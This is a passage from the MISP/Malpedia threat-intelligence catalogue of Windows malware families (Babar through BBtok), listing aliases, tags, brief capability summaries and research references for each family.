https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/
https://twitter.com/DrStache_/status/1227662001247268864
https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/
https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf
https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/
https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf
https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/
https://unit42.paloaltonetworks.com/cybersquatting/
https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan
https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://securelist.com/azorult-analysis-history/89922/
https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672
https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east
https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html
https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware
https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign
http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html
https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/
https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/
https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

Babar

The tag is: misp-galaxy:malpedia="Babar"

Babar is also known as:

SNOWBALL

Table 1435. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.babar
http://www.spiegel.de/media/media-35683.pdf
https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/
https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/
https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/
https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope

Babuk (Windows)

Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.

The tag is: misp-galaxy:malpedia="Babuk (Windows)"

Babuk (Windows) is also known as:

Babyk
Vasa Locker

Table 1436. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf
https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/
https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62
https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/
https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/
https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1
https://twitter.com/Sebdraven/status/1346377590525845504
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/
https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/
https://securelist.com/ransomware-world-in-2021/102169/
https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/
https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings
https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/
https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/
https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2
https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/
https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d
https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f
http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/
https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html
https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/
https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751
https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/
https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b
https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/
https://twitter.com/GossiTheDog/status/1409117153182224386
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/
https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf
https://www.fr.sogeti.com/globalassets/france/avis-dexperts—livres-blancs/cybersecchronicles_-babuk.pdf[https://www.fr.sogeti.com/globalassets/france/avis-dexperts—livres-blancs/cybersecchronicles-_babuk.pdf]

BabyLon RAT

The tag is: misp-galaxy:malpedia="BabyLon RAT"

BabyLon RAT is also known as:

Table 1437. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat
https://twitter.com/KorbenD_Intel/status/1110654679980085262

BABYMETAL

BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.

The tag is: misp-galaxy:malpedia="BABYMETAL"

BABYMETAL is also known as:

Table 1438. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.infosecurityeurope.com/novadocuments/367989?v=636338290033030000[https://www.infosecurityeurope.com/novadocuments/367989?v=636338290033030000]
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

BabyShark

BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator

The tag is: misp-galaxy:malpedia="BabyShark"

BabyShark is also known as:

Table 1439. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark
https://www.youtube.com/watch?v=rfzmHjZX70s
https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html
https://blog.alyac.co.kr/3352
https://www.youtube.com/watch?v=Dv2_DK3tRgI
https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf
https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1
https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf
https://twitter.com/i/web/status/1099147896950185985
https://us-cert.cisa.gov/ncas/alerts/aa20-301a
https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html

BACKBEND

FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.

The tag is: misp-galaxy:malpedia="BACKBEND"

BACKBEND is also known as:

Table 1440. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

BackNet

The tag is: misp-galaxy:malpedia="BackNet"

BackNet is also known as:

Table 1441. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet
https://github.com/valsov/BackNet

Backoff POS

The tag is: misp-galaxy:malpedia="Backoff POS"

Backoff POS is also known as:

Table 1442. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff
https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/

backspace

The tag is: misp-galaxy:malpedia="backspace"

backspace is also known as:

Lecna
ZRLnk

Table 1443. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace
https://www.secureworks.com/research/threat-profiles/bronze-geneva
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

BackSwap

The tag is: misp-galaxy:malpedia="BackSwap"

BackSwap is also known as:

Table 1444. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap
https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/
https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi
https://www.cert.pl/en/news/single/backswap-malware-analysis/
https://research.checkpoint.com/the-evolution-of-backswap/
https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/
https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/
https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf
https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

BADCALL (Windows)

The tag is: misp-galaxy:malpedia="BADCALL (Windows)"

BADCALL (Windows) is also known as:

Table 1445. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall
https://www.us-cert.gov/ncas/analysis-reports/ar19-252a
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

BadEncript

The tag is: misp-galaxy:malpedia="BadEncript"

BadEncript is also known as:

Table 1446. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript
https://twitter.com/PhysicalDrive0/status/833067081981710336

badflick

BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.

The tag is: misp-galaxy:malpedia="badflick"

badflick is also known as:

Table 1447. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://blog.amossys.fr/badflick-is-not-so-bad.html

BADHATCH

The tag is: misp-galaxy:malpedia="BADHATCH"

BADHATCH is also known as:

Table 1448. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch
https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf
https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/

BadNews

The tag is: misp-galaxy:malpedia="BadNews"

BadNews is also known as:

Table 1449. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews
http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2
https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://securelist.com/apt-trends-report-q1-2021/101967/
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf
https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf
https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign
https://lab52.io/blog/new-patchwork-campaign-against-pakistan/

Bagle

The tag is: misp-galaxy:malpedia="Bagle"

Bagle is also known as:

Table 1450. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle

Bahamut (Windows)

The tag is: misp-galaxy:malpedia="Bahamut (Windows)"

Bahamut (Windows) is also known as:

Table 1451. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut
https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf
https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/

Baldr

The tag is: misp-galaxy:malpedia="Baldr"

Baldr is also known as:

Baldir

Table 1452. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr
https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf
https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/
https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/
https://www.youtube.com/watch?v=E2V4kB_gtcQ

BalkanDoor

According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.

The tag is: misp-galaxy:malpedia="BalkanDoor"

BalkanDoor is also known as:

Table 1453. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door
https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/

BalkanRAT

The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accouting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimaly signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250).

The tag is: misp-galaxy:malpedia="BalkanRAT"

BalkanRAT is also known as:

Table 1454. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_rat
https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/

Bamital

The tag is: misp-galaxy:malpedia="Bamital"

Bamital is also known as:

Table 1455. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital
https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf

Banatrix

The tag is: misp-galaxy:malpedia="Banatrix"

Banatrix is also known as:

Table 1456. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix
https://www.cert.pl/en/news/single/banatrix-an-indepth-look/

bancos

The tag is: misp-galaxy:malpedia="bancos"

bancos is also known as:

Table 1457. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bancos
https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html

Bandook

The tag is: misp-galaxy:malpedia="Bandook"

Bandook is also known as:

Bandok

Table 1458. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook
https://twitter.com/malwrhunterteam/status/796425285197561856
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook
https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot
https://research.checkpoint.com/2020/bandook-signed-delivered/
https://www.eff.org/files/2018/01/29/operation-manul.pdf
https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/

bangat

The tag is: misp-galaxy:malpedia="bangat"

bangat is also known as:

Table 1459. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat
https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal

Banjori

The tag is: misp-galaxy:malpedia="Banjori"

Banjori is also known as:

BackPatcher
BankPatch
MultiBanker 2

Table 1460. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori
http://blog.kleissner.org/?p=69
http://osint.bambenekconsulting.com/feeds/
https://www.johannesbader.ch/2015/02/the-dga-of-banjori/
http://blog.kleissner.org/?p=192

Bankshot

The tag is: misp-galaxy:malpedia="Bankshot"

Bankshot is also known as:

COPPERHEDGE

Table 1461. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a
https://www.secureworks.com/research/threat-profiles/nickel-gladstone
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF
https://www.us-cert.gov/ncas/analysis-reports/ar20-133a
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://blog.reversinglabs.com/blog/hidden-cobra

barkiofork

The tag is: misp-galaxy:malpedia="barkiofork"

barkiofork is also known as:

Table 1462. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork
https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry

Bart

The tag is: misp-galaxy:malpedia="Bart"

Bart is also known as:

Table 1463. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bart
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

BatchWiper

The tag is: misp-galaxy:malpedia="BatchWiper"

BatchWiper is also known as:

Table 1464. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper
http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs

Batel

The tag is: misp-galaxy:malpedia="Batel"

Batel is also known as:

Table 1465. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.batel
https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

BazarBackdoor

BazarBackdoor is a small backdoor, probably by a TrickBot "spin-off" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).

For now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.

The tag is: misp-galaxy:malpedia="BazarBackdoor"

BazarBackdoor is also known as:

BEERBOT
KEGTAP
Team9Backdoor
bazaloader
bazarloader

Table 1466. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor
https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/
https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv
https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware
https://cofense.com/blog/bazarbackdoor-stealthy-infiltration
https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html
https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon
https://unit42.paloaltonetworks.com/bazarloader-malware/
https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/
https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day
https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/
https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e
https://thedfirreport.com/2021/01/31/bazar-no-ryuk/
https://thedfirreport.com/2020/10/08/ryuks-return/
https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/
https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/
https://johannesbader.ch/blog/yet-another-bazarloader-dga/
https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf
https://unit42.paloaltonetworks.com/ryuk-ransomware/
https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors
https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/
https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader
https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.youtube.com/watch?v=uAkeXCYcl4Y
https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors
https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/
https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/
https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/
https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I
https://isc.sans.edu/diary/27308
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II
https://fr3d.hk/blog/campo-loader-simple-but-effective
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident
https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://twitter.com/anthomsec/status/1321865315513520128
https://www.hhs.gov/sites/default/files/bazarloader.pdf
https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/
https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike
https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth
https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware
https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9
https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf[https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf]
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
https://www.scythe.io/library/threatthursday-ryuk
https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/
https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles
https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/
https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor
https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware
https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/

BazarNimrod

A rewrite of Bazarloader in the Nim programming language.

The tag is: misp-galaxy:malpedia="BazarNimrod"

BazarNimrod is also known as:

NimzaLoader

Table 1467. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques
https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811
https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware
https://twitter.com/James_inthe_box/status/1357009652857196546
https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e
https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

BBSRAT

The tag is: misp-galaxy:malpedia="BBSRAT"

BBSRAT is also known as:

Table 1468. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat
https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae
https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf
https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb
https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/

BBtok

360 Security Center describes BBtok as a banking trojan targeting Mexico.

